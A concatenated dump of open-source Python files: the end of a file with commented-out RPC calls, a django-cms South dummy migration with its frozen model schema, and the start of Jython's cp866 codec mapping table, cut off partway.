# d = State.RPCP(1,1,'82.219.0.1',10,10000)
# print d.extensive()
# ========================================================================= Dump
#
class Dump:
pass
| bsd-3-clause |
MagicSolutions/django-cms | cms/migrations/0029_limit_visibility_in_menu_step2of3_data.py | 525 | 20033 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.module_name)
user_ptr_name = '%s_ptr' % User._meta.object_name.lower()
class Migration(SchemaMigration):
def forwards(self, orm):
# Dummy migration
pass
def backwards(self, orm):
# Dummy migration
pass
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [],
{'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [],
{'to': "orm['auth.Permission']", 'symmetrical': 'False',
'blank': 'True'})
},
'auth.permission': {
'Meta': {
'ordering': "('content_type__app_label', 'content_type__model', 'codename')",
'unique_together': "(('content_type', 'codename'),)",
'object_name': 'Permission'},
'codename': (
'django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['contenttypes.ContentType']"}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'%s'" % User._meta.db_table},
'date_joined': ('django.db.models.fields.DateTimeField', [],
{'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [],
{'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [],
{'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [],
{'to': "orm['auth.Group']", 'symmetrical': 'False',
'blank': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [],
{'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [],
{'max_length': '30', 'blank': 'True'}),
'password': (
'django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': (
'django.db.models.fields.related.ManyToManyField', [],
{'to': "orm['auth.Permission']", 'symmetrical': 'False',
'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [],
{'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [],
{'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [],
{'default': 'datetime.datetime.now'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [],
{'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['cms.CMSPlugin']", 'null': 'True',
'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [],
{'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [],
{'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'})
},
'cms.globalpagepermission': {
'Meta': {'object_name': 'GlobalPagePermission'},
'can_add': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_moderate': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_recover_page': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'group': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'to': "orm['sites.Site']",
'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.page': {
'Meta': {'ordering': "('site', 'tree_id', 'lft')",
'object_name': 'Page'},
'changed_by': (
'django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [],
{'auto_now': 'True', 'blank': 'True'}),
'created_by': (
'django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [],
{'auto_now_add': 'True', 'blank': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [],
{'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'}),
'limit_visibility_in_menu': (
'django.db.models.fields.SmallIntegerField', [],
{'default': 'None', 'null': 'True', 'db_index': 'True',
'blank': 'True'}),
'login_required': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderator_state': ('django.db.models.fields.SmallIntegerField', [],
{'default': '1', 'blank': 'True'}),
'navigation_extenders': ('django.db.models.fields.CharField', [],
{'db_index': 'True', 'max_length': '80',
'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [],
{'blank': 'True', 'related_name': "'children'",
'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [],
{'to': "orm['cms.Placeholder']",
'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [],
{'db_index': 'True', 'null': 'True',
'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [],
{'db_index': 'True', 'null': 'True',
'blank': 'True'}),
'published': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [],
{'default': 'True', 'db_index': 'True'}),
'publisher_public': (
'django.db.models.fields.related.OneToOneField', [],
{'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True',
'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [],
{'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [],
{'db_index': 'True', 'max_length': '40', 'null': 'True',
'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [],
{'default': 'False', 'db_index': 'True'}),
'template': (
'django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [],
{'db_index': 'True'})
},
'cms.pagemoderator': {
'Meta': {'object_name': 'PageModerator'},
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderate_children': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderate_descendants': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderate_page': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'page': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['%s']" % user_orm_label})
},
'cms.pagemoderatorstate': {
'Meta': {'ordering': "('page', 'action', '-created')",
'object_name': 'PageModeratorState'},
'action': ('django.db.models.fields.CharField', [],
{'max_length': '3', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [],
{'auto_now_add': 'True', 'blank': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [],
{'default': "''", 'max_length': '1000', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['%s']" % user_orm_label, 'null': 'True'})
},
'cms.pagepermission': {
'Meta': {'object_name': 'PagePermission'},
'can_add': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_moderate': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': (
'django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': (
'django.db.models.fields.BooleanField', [], {'default': 'False'}),
'grant_on': (
'django.db.models.fields.IntegerField', [], {'default': '5'}),
'group': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.pageuser': {
'Meta': {'object_name': 'PageUser', '_ormbases': [user_orm_label]},
'created_by': ('django.db.models.fields.related.ForeignKey', [],
{'related_name': "'created_users'",
'to': "orm['%s']" % user_orm_label}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [],
{'to': "orm['%s']" % user_orm_label, 'unique': 'True',
'primary_key': 'True'})
},
'cms.pageusergroup': {
'Meta': {'object_name': 'PageUserGroup', '_ormbases': ['auth.Group']},
'created_by': ('django.db.models.fields.related.ForeignKey', [],
{'related_name': "'created_usergroups'",
'to': "orm['%s']" % user_orm_label}),
'group_ptr': ('django.db.models.fields.related.OneToOneField', [],
{'to': "orm['auth.Group']", 'unique': 'True',
'primary_key': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': (
'django.db.models.fields.PositiveSmallIntegerField', [],
{'null': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [],
{'max_length': '50', 'db_index': 'True'})
},
'cms.title': {
'Meta': {'unique_together': "(('language', 'page'),)",
'object_name': 'Title'},
'application_urls': ('django.db.models.fields.CharField', [],
{'db_index': 'True', 'max_length': '200',
'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [],
{'default': 'datetime.datetime.now'}),
'has_url_overwrite': ('django.db.models.fields.BooleanField', [],
{'default': 'False', 'db_index': 'True'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [],
{'max_length': '15', 'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [],
{'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [],
{'max_length': '255', 'null': 'True',
'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.CharField', [],
{'max_length': '255', 'null': 'True',
'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [],
{'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
'page_title': ('django.db.models.fields.CharField', [],
{'max_length': '255', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [],
{'max_length': '255', 'db_index': 'True'}),
'redirect': ('django.db.models.fields.CharField', [],
{'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': (
'django.db.models.fields.SlugField', [], {'max_length': '255'}),
'title': (
'django.db.models.fields.CharField', [], {'max_length': '255'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)",
'unique_together': "(('app_label', 'model'),)",
'object_name': 'ContentType',
'db_table': "'django_content_type'"},
'app_label': (
'django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': (
'django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site',
'db_table': "'django_site'"},
'domain': (
'django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': (
'django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['cms']
| bsd-3-clause |
mosbasik/buzhug | javasrc/lib/Jython/Lib/encodings/cp866.py | 593 | 34652 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP866.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp866',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0410, # CYRILLIC CAPITAL LETTER A
0x0081: 0x0411, # CYRILLIC CAPITAL LETTER BE
0x0082: 0x0412, # CYRILLIC CAPITAL LETTER VE
0x0083: 0x0413, # CYRILLIC CAPITAL LETTER GHE
0x0084: 0x0414, # CYRILLIC CAPITAL LETTER DE
0x0085: 0x0415, # CYRILLIC CAPITAL LETTER IE
0x0086: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
0x0087: 0x0417, # CYRILLIC CAPITAL LETTER ZE
0x0088: 0x0418, # CYRILLIC CAPITAL LETTER I
0x0089: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
0x008a: 0x041a, # CYRILLIC CAPITAL LETTER KA
0x008b: 0x041b, # CYRILLIC CAPITAL LETTER EL
0x008c: 0x041c, # CYRILLIC CAPITAL LETTER EM
0x008d: 0x041d, # CYRILLIC CAPITAL LETTER EN
0x008e: 0x041e, # CYRILLIC CAPITAL LETTER O
0x008f: 0x041f, # CYRILLIC CAPITAL LETTER PE
0x0090: 0x0420, # CYRILLIC CAPITAL LETTER ER
0x0091: 0x0421, # CYRILLIC CAPITAL LETTER ES
0x0092: 0x0422, # CYRILLIC CAPITAL LETTER TE
0x0093: 0x0423, # CYRILLIC CAPITAL LETTER U
0x0094: 0x0424, # CYRILLIC CAPITAL LETTER EF
0x0095: 0x0425, # CYRILLIC CAPITAL LETTER HA
0x0096: 0x0426, # CYRILLIC CAPITAL LETTER TSE
0x0097: 0x0427, # CYRILLIC CAPITAL LETTER CHE
0x0098: 0x0428, # CYRILLIC CAPITAL LETTER SHA
0x0099: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
0x009a: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x009b: 0x042b, # CYRILLIC CAPITAL LETTER YERU
0x009c: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x009d: 0x042d, # CYRILLIC CAPITAL LETTER E
0x009e: 0x042e, # CYRILLIC CAPITAL LETTER YU
0x009f: 0x042f, # CYRILLIC CAPITAL LETTER YA
0x00a0: 0x0430, # CYRILLIC SMALL LETTER A
0x00a1: 0x0431, # CYRILLIC SMALL LETTER BE
0x00a2: 0x0432, # CYRILLIC SMALL LETTER VE
0x00a3: 0x0433, # CYRILLIC SMALL LETTER GHE
0x00a4: 0x0434, # CYRILLIC SMALL LETTER DE
0x00a5: 0x0435, # CYRILLIC SMALL LETTER IE
0x00a6: 0x0436, # CYRILLIC SMALL LETTER ZHE
0x00a7: 0x0437, # CYRILLIC SMALL LETTER ZE
0x00a8: 0x0438, # CYRILLIC SMALL LETTER I
0x00a9: 0x0439, # CYRILLIC SMALL LETTER SHORT I
0x00aa: 0x043a, # CYRILLIC SMALL LETTER KA
0x00ab: 0x043b, # CYRILLIC SMALL LETTER EL
0x00ac: 0x043c, # CYRILLIC SMALL LETTER EM
0x00ad: 0x043d, # CYRILLIC SMALL LETTER EN
0x00ae: 0x043e, # CYRILLIC SMALL LETTER O
0x00af: 0x043f, # CYRILLIC SMALL LETTER PE
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x0440, # CYRILLIC SMALL LETTER ER
0x00e1: 0x0441, # CYRILLIC SMALL LETTER ES
0x00e2: 0x0442, # CYRILLIC SMALL LETTER TE
0x00e3: 0x0443, # CYRILLIC SMALL LETTER U
0x00e4: 0x0444, # CYRILLIC SMALL LETTER EF
0x00e5: 0x0445, # CYRILLIC SMALL LETTER HA
0x00e6: 0x0446, # CYRILLIC SMALL LETTER TSE
0x00e7: 0x0447, # CYRILLIC SMALL LETTER CHE
0x00e8: 0x0448, # CYRILLIC SMALL LETTER SHA
0x00e9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
0x00ea: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
0x00eb: 0x044b, # CYRILLIC SMALL LETTER YERU
0x00ec: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
0x00ed: 0x044d, # CYRILLIC SMALL LETTER E
0x00ee: 0x044e, # CYRILLIC SMALL LETTER YU
0x00ef: 0x044f, # CYRILLIC SMALL LETTER YA
0x00f0: 0x0401, # CYRILLIC CAPITAL LETTER IO
0x00f1: 0x0451, # CYRILLIC SMALL LETTER IO
0x00f2: 0x0404, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
0x00f3: 0x0454, # CYRILLIC SMALL LETTER UKRAINIAN IE
0x00f4: 0x0407, # CYRILLIC CAPITAL LETTER YI
0x00f5: 0x0457, # CYRILLIC SMALL LETTER YI
0x00f6: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U
0x00f7: 0x045e, # CYRILLIC SMALL LETTER SHORT U
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x2116, # NUMERO SIGN
0x00fd: 0x00a4, # CURRENCY SIGN
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
